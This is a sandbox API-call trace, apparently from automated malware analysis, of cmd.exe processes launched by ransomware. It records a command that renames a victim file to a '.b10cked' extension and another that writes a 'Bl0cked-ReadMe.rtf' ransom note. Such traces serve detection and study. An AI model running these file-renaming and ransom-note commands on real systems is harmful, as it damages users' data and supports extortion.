0x2 [0202.409] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x20e95c, lpData=0x20e960, lpcbData=0x20e958*=0x1000 | out: lpType=0x20e95c*=0x4, lpData=0x20e960*=0x1, lpcbData=0x20e958*=0x4) returned 0x0 [0202.409] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x20e95c, lpData=0x20e960, lpcbData=0x20e958*=0x1000 | out: lpType=0x20e95c*=0x0, lpData=0x20e960*=0x1, lpcbData=0x20e958*=0x1000) returned 0x2 [0202.409] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x20e95c, lpData=0x20e960, lpcbData=0x20e958*=0x1000 | out: lpType=0x20e95c*=0x4, lpData=0x20e960*=0x0, lpcbData=0x20e958*=0x4) returned 0x0 [0202.409] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x20e95c, lpData=0x20e960, lpcbData=0x20e958*=0x1000 | out: lpType=0x20e95c*=0x4, lpData=0x20e960*=0x40, lpcbData=0x20e958*=0x4) returned 0x0 [0202.409] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x20e95c, lpData=0x20e960, lpcbData=0x20e958*=0x1000 | out: lpType=0x20e95c*=0x4, lpData=0x20e960*=0x40, lpcbData=0x20e958*=0x4) returned 0x0 [0202.409] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x20e95c, lpData=0x20e960, lpcbData=0x20e958*=0x1000 | out: lpType=0x20e95c*=0x0, lpData=0x20e960*=0x40, lpcbData=0x20e958*=0x1000) returned 0x2 [0202.409] RegCloseKey (hKey=0x40) returned 0x0 [0202.409] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x20e954 | out: phkResult=0x20e954*=0x40) returned 0x0 [0202.409] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x20e95c, lpData=0x20e960, lpcbData=0x20e958*=0x1000 | out: lpType=0x20e95c*=0x0, lpData=0x20e960*=0x40, lpcbData=0x20e958*=0x1000) returned 0x2 [0202.409] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x20e95c, lpData=0x20e960, lpcbData=0x20e958*=0x1000 | out: lpType=0x20e95c*=0x4, lpData=0x20e960*=0x1, lpcbData=0x20e958*=0x4) returned 0x0 [0202.409] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x20e95c, lpData=0x20e960, lpcbData=0x20e958*=0x1000 | out: lpType=0x20e95c*=0x0, lpData=0x20e960*=0x1, lpcbData=0x20e958*=0x1000) returned 0x2 [0202.409] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x20e95c, lpData=0x20e960, lpcbData=0x20e958*=0x1000 | out: lpType=0x20e95c*=0x4, lpData=0x20e960*=0x0, lpcbData=0x20e958*=0x4) returned 0x0 [0202.409] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x20e95c, lpData=0x20e960, lpcbData=0x20e958*=0x1000 | out: lpType=0x20e95c*=0x4, lpData=0x20e960*=0x9, lpcbData=0x20e958*=0x4) returned 0x0 [0202.409] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x20e95c, lpData=0x20e960, lpcbData=0x20e958*=0x1000 | out: lpType=0x20e95c*=0x4, lpData=0x20e960*=0x9, lpcbData=0x20e958*=0x4) returned 0x0 [0202.410] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x20e95c, lpData=0x20e960, lpcbData=0x20e958*=0x1000 | out: lpType=0x20e95c*=0x0, lpData=0x20e960*=0x9, lpcbData=0x20e958*=0x1000) returned 0x2 [0202.410] RegCloseKey (hKey=0x40) returned 0x0 [0202.410] time (in: timer=0x0 | out: timer=0x0) returned 0x5b8863a4 [0202.410] srand (_Seed=0x5b8863a4) [0202.410] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{33D1F~1\\state.rsm\" \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{33D1F~1\\state.rsm.b10cked\"" [0202.410] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{33D1F~1\\state.rsm\" \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{33D1F~1\\state.rsm.b10cked\"" [0202.410] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0202.410] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x2718f0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0202.410] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0202.410] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0202.410] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0202.410] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0202.410] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0202.410] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0202.410] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0202.410] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0202.410] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0202.410] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0202.410] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0202.410] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0202.411] GetEnvironmentStringsW () returned 0x2722e0* [0202.411] FreeEnvironmentStringsW (penv=0x2722e0) returned 1 [0202.411] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0202.411] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0202.411] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0202.411] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0202.411] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0202.411] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0202.411] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0202.411] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0202.411] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0202.411] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0202.411] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x20f720 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0202.411] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x20f720, lpFilePart=0x20f71c | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x20f71c*="Desktop") returned 0x18 [0202.411] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0202.411] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x20f49c | out: lpFindFileData=0x20f49c) returned 0x270020 [0202.411] FindClose (in: hFindFile=0x270020 | out: hFindFile=0x270020) returned 1 [0202.411] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x20f49c | out: lpFindFileData=0x20f49c) returned 0x270020 [0202.411] FindClose (in: hFindFile=0x270020 | out: hFindFile=0x270020) returned 1 [0202.412] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x20f49c | out: lpFindFileData=0x20f49c) returned 0x270020 [0202.412] FindClose (in: hFindFile=0x270020 | out: hFindFile=0x270020) returned 1 [0202.412] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0202.412] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0202.412] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0202.412] GetEnvironmentStringsW () returned 0x272b00* [0202.412] FreeEnvironmentStringsW (penv=0x272b00) returned 1 [0202.412] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0202.412] GetConsoleOutputCP () returned 0x1b5 [0202.412] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0202.412] GetUserDefaultLCID () returned 0x409 [0202.413] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0202.413] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x20f860, cchData=128 | out: lpLCData="0") returned 2 [0202.413] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x20f860, cchData=128 | out: lpLCData="0") returned 2 [0202.413] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x20f860, cchData=128 | out: lpLCData="1") returned 2 [0202.413] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0202.413] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0202.413] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0202.413] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0202.413] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0202.413] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0202.413] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0202.413] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0202.413] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0202.413] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0202.413] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0202.414] GetConsoleTitleW (in: lpConsoleTitle=0x2608e8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0202.414] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0202.414] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0202.414] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0202.414] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0202.415] _wcsicmp (_String1="move", _String2=")") returned 68 [0202.415] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0202.415] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0202.415] _wcsicmp (_String1="IF", _String2="move") returned -4 [0202.415] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0202.415] _wcsicmp (_String1="REM", _String2="move") returned 5 [0202.415] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0202.418] GetConsoleTitleW (in: lpConsoleTitle=0x20f558, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0202.418] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0202.418] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0202.418] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0202.418] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0202.418] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0202.418] _wcsicmp (_String1="move", _String2="CD") returned 10 [0202.418] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0202.418] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0202.418] _wcsicmp (_String1="move", _String2="REN") returned -5 [0202.418] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0202.418] _wcsicmp (_String1="move", _String2="SET") returned -6 [0202.418] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0202.418] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0202.418] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0202.418] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0202.418] _wcsicmp (_String1="move", _String2="MD") returned 11 [0202.418] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0202.418] _wcsicmp (_String1="move", _String2="RD") returned -5 [0202.418] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0202.418] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0202.418] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0202.418] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0202.418] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0202.418] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0202.418] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0202.418] _wcsicmp (_String1="move", _String2="VER") returned -9 [0202.418] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0202.418] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0202.419] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0202.419] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0202.419] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0202.419] _wcsicmp (_String1="move", _String2="START") returned -6 [0202.419] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0202.419] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0202.419] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0202.420] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0202.420] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0202.420] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x20f314, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x20f30c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x20f30c*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0202.421] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0202.421] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0202.421] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0202.421] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0202.421] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0202.421] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0202.421] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0202.421] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0202.421] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0202.421] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0202.421] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0202.421] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0202.421] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0202.421] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0202.421] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0202.421] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0202.421] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0202.421] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0202.421] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0202.421] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0202.421] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0202.421] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0202.421] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0202.421] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0202.421] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0202.421] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0202.421] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0202.421] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0202.421] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0202.421] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0202.421] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0202.421] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0202.422] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0202.422] _wcsicmp (_String1="state.rsm", _String2=".") returned 69 [0202.422] _wcsicmp (_String1="state.rsm", _String2="..") returned 69 [0202.422] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\PACKAG~1\\{33D1F~1\\state.rsm" (normalized: "c:\\users\\alluse~1\\packag~1\\{33d1f~1\\state.rsm")) returned 0x20 [0202.550] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x271e50 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0202.550] SetErrorMode (uMode=0x0) returned 0x0 [0202.550] SetErrorMode (uMode=0x1) returned 0x0 [0202.550] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\PACKAG~1\\{33D1F~1\\state.rsm", nBufferLength=0x104, lpBuffer=0x20ec9c, lpFilePart=0x20ec84 | out: lpBuffer="C:\\Users\\ALLUSE~1\\PACKAG~1\\{33D1F~1\\state.rsm", lpFilePart=0x20ec84*="state.rsm") returned 0x2d [0202.550] SetErrorMode (uMode=0x0) returned 0x1 [0202.550] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\PACKAG~1\\{33D1F~1" (normalized: "c:\\users\\alluse~1\\packag~1\\{33d1f~1")) returned 0x10 [0202.550] _wcsicmp (_String1="state.rsm", _String2=".") returned 69 [0202.550] _wcsicmp (_String1="state.rsm", _String2="..") returned 69 [0202.550] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\PACKAG~1\\{33D1F~1\\state.rsm" (normalized: "c:\\users\\alluse~1\\packag~1\\{33d1f~1\\state.rsm")) returned 0x20 [0202.550] SetErrorMode (uMode=0x0) returned 0x0 [0202.550] SetErrorMode (uMode=0x1) returned 0x0 [0202.550] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\PACKAG~1\\{33D1F~1\\state.rsm", nBufferLength=0x104, lpBuffer=0x20f118, lpFilePart=0x20eeb0 | out: lpBuffer="C:\\Users\\ALLUSE~1\\PACKAG~1\\{33D1F~1\\state.rsm", lpFilePart=0x20eeb0*="state.rsm") returned 0x2d [0202.550] SetErrorMode (uMode=0x0) returned 0x1 [0202.550] SetErrorMode (uMode=0x0) returned 0x0 [0202.550] SetErrorMode (uMode=0x1) returned 0x0 [0202.550] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\PACKAG~1\\{33D1F~1\\state.rsm.b10cked", nBufferLength=0x104, lpBuffer=0x20f320, lpFilePart=0x20eeb0 | out: lpBuffer="C:\\Users\\ALLUSE~1\\PACKAG~1\\{33D1F~1\\state.rsm.b10cked", lpFilePart=0x20eeb0*="state.rsm.b10cked") returned 0x35 [0202.550] SetErrorMode (uMode=0x0) returned 0x1 [0202.550] SetLastError (dwErrCode=0x0) [0202.550] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\PACKAG~1\\{33D1F~1\\state.rsm.b10cked" (normalized: "c:\\users\\alluse~1\\packag~1\\{33d1f~1\\state.rsm.b10cked")) returned 0xffffffff [0202.551] GetLastError () returned 0x2 [0202.551] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\PACKAG~1\\{33D1F~1\\state.rsm", fInfoLevelId=0x1, lpFindFileData=0x20e82c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x20e82c) returned 0x260e88 [0202.551] FindNextFileW (in: hFindFile=0x260e88, lpFindFileData=0x20e82c | out: lpFindFileData=0x20e82c) returned 0 [0202.551] GetLastError () returned 0x12 [0202.551] FindClose (in: hFindFile=0x260e88 | out: hFindFile=0x260e88) returned 1 [0202.552] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\PACKAG~1\\{33D1F~1\\state.rsm", fInfoLevelId=0x1, lpFindFileData=0x271bf0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x271bf0) returned 0x260e88 [0202.552] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\PACKAG~1\\{33D1F~1\\state.rsm.b10cked", nBufferLength=0x104, lpBuffer=0x20eac4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\ALLUSE~1\\PACKAG~1\\{33D1F~1\\state.rsm.b10cked", lpFilePart=0x0) returned 0x35 [0202.552] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\PACKAG~1\\{33D1F~1\\state.rsm", nBufferLength=0x104, lpBuffer=0x20eac4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\ALLUSE~1\\PACKAG~1\\{33D1F~1\\state.rsm", lpFilePart=0x0) returned 0x2d [0202.552] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\PACKAG~1\\{33D1F~1\\state.rsm" (normalized: "c:\\users\\alluse~1\\packag~1\\{33d1f~1\\state.rsm")) returned 0x20 [0202.552] MoveFileExW (lpExistingFileName="C:\\Users\\ALLUSE~1\\PACKAG~1\\{33D1F~1\\state.rsm" (normalized: "c:\\users\\alluse~1\\packag~1\\{33d1f~1\\state.rsm"), lpNewFileName="C:\\Users\\ALLUSE~1\\PACKAG~1\\{33D1F~1\\state.rsm.b10cked" (normalized: "c:\\users\\alluse~1\\packag~1\\{33d1f~1\\state.rsm.b10cked"), dwFlags=0x3) returned 1 [0202.553] FindClose (in: hFindFile=0x260e88 | out: hFindFile=0x260e88) returned 1 [0202.553] _vsnwprintf (in: _Buffer=0x4a9e5040, _BufferCount=0x103, _Format="%9d", _ArgList=0x20ea78 | out: _Buffer=" 1") returned 9 [0202.553] _get_osfhandle (_FileHandle=1) returned 0x7 [0202.553] GetFileType (hFile=0x7) returned 0x2 [0202.557] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0202.557] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x20ea04 | out: lpMode=0x20ea04) returned 1 [0202.561] _get_osfhandle (_FileHandle=1) returned 0x7 [0202.561] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x20ea38 | out: lpConsoleScreenBufferInfo=0x20ea38) returned 1 [0202.561] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0202.562] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x20ea78 | out: lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0202.562] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0x20ea5c, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x20ea5c*=0x1a) returned 1 [0202.562] _get_osfhandle (_FileHandle=1) returned 0x7 [0202.562] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0202.562] _get_osfhandle (_FileHandle=1) returned 0x7 [0202.562] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0202.562] _get_osfhandle (_FileHandle=0) returned 0x3 [0202.562] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0202.562] SetConsoleInputExeNameW () returned 0x1 [0202.562] GetConsoleOutputCP () returned 0x1b5 [0202.563] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0202.563] SetThreadUILanguage (LangId=0x0) returned 0x409 [0202.563] exit (_Code=0) Process: id = "488" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16b20" os_pid = "0xef0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{33D1F~1\\Bl0cked-ReadMe.rtf\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 29491 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 29492 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 29493 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 29494 start_va = 0x210000 end_va = 0x30ffff entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 29495 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 29496 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 29497 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = 